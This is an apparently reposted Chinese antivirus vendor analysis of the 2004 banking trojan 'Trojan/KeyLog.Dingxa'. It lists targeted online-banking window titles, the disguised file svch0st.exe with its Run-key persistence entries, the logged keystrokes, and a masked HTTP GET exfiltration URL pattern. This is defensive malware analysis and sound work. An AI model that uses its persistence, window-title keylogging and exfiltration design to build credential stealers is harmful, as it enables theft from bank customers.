网银大盗Ⅱ(Trojan/KeyLog.Dingxa)技术分析报告

类别:编程语言 点击:0 评论:0 推荐:
“网银大盗Ⅱ”技术分析报告

  病毒名称:网银大盗Ⅱ(Trojan/KeyLog.Dingxa)
  病毒类型:木马
  病毒大小:16284字节
  传播方式:网络
  压缩方式:ASpack

  2004年6月2日晚,又截获“网银大盗”新变种,该木马盗取几乎涵盖中国目前所有个人网上银行的帐号、密码、验证码等等,发送给病毒作者。此木马与4月分截获网银大盗(Trojan/PSW.HidWebmon)有异曲同工之处,但涉及银行之多,范围之广是历来最大的,不但给染毒用户造成的损失更大,更直接,也给各网上银行造成更大的安全威胁和信任危机。

  具体技术特征如下:

  1. 病毒运行后,盗取的网上银行涉及:
  
  银联支付网关-->执行支付
  银联支付网关:
  中国工商银行新一代网上银行
  中国工商银行网上银行:
  工商银行网上支付:
  申请牡丹信用卡
  招商银行个人银行
  招商银行一网通:
  个人网上银行
  中国建设银行网上银行
  登陆个人网上银行;;
  中国建设银行
  中国建设银行网上银行:
  交通银行网上银行
  交通银行网上银行:
  深圳发展银行帐户查询系统
  深圳发展银行|个人银行
  深圳发展银行 | 个人用户申请表
  深圳发展银行:
  民生网个人普通版
  民生银行:
  网上银行--个人普通业务
  华夏银行:
  上海银行企业网上银行
  上海银行
  首都电子商城商户管理平台
  首都电子商城商户管理
  中国在线支付网: IPAY网上支付中心
  中国在线支付网商户
  招商银行网上支付中心
  招商银行网上支付
  个人网上银行-网上支付

  2. 病毒算机中创建以下文件:

  %SystemDir%\svch0st.exe,16284字节,病毒本身

  3. 在注册表的HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run中创建:

  “svch0st.exe” = “%SystemDir%\svch0st.exe”
  “taskmgr.exe” = “%SystemDir%\svch0st.exe”


  4. 病毒运行后会根据IE窗口标题栏判断是否为网上银行页面,如果发现上述提到的银行后,病毒立即开始记录键盘敲击的每一个键值,记录键值包括:

  AabCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz1
  !2@3#4$5%6^7&8*9(0)
  {BackSpace}
  {Tab}
  {回车}
  {Shift}
  {Ctrl}
  {Alt}
  {Pause}
  {Esc}
  {空格}
  {End}
  {Home}
  {Left}
  {Right}
  {Up}
  {Down}
  {Insert}
  {Delete}
  ;:=+,<-_.>/?`~][{\|]}'
  {Del}
  {F1}
  {F2}
  {F3}
  {F4}
  {F5}
  {F6}
  {F7}
  {F8}
  {F9}
  {F10}
  {F11}
  {F12}
  {NumLock}
  {ScrollLock}
  {PrintScreen}
  {PageUp}
  {PageDown}

  5. 病毒截取到键盘值后,会形成信息发到指定http://*****.com/****/get.asp。其信息如下:

  http://*****.com/****/get.asp?txt=××银行:<截获的按键>

  6.病毒开启3个定时器,每隔几秒钟搜索用户的IE窗口,如果发现用户正在使用上述银行的“个人网上银行”的登陆界面,则尝试记录用户键入的所有键值,然后把窃取到的信息通过get方式发送到指定的服务器。

出处:江民科技

本文地址:http://com.8s8s.com/it/it23983.htm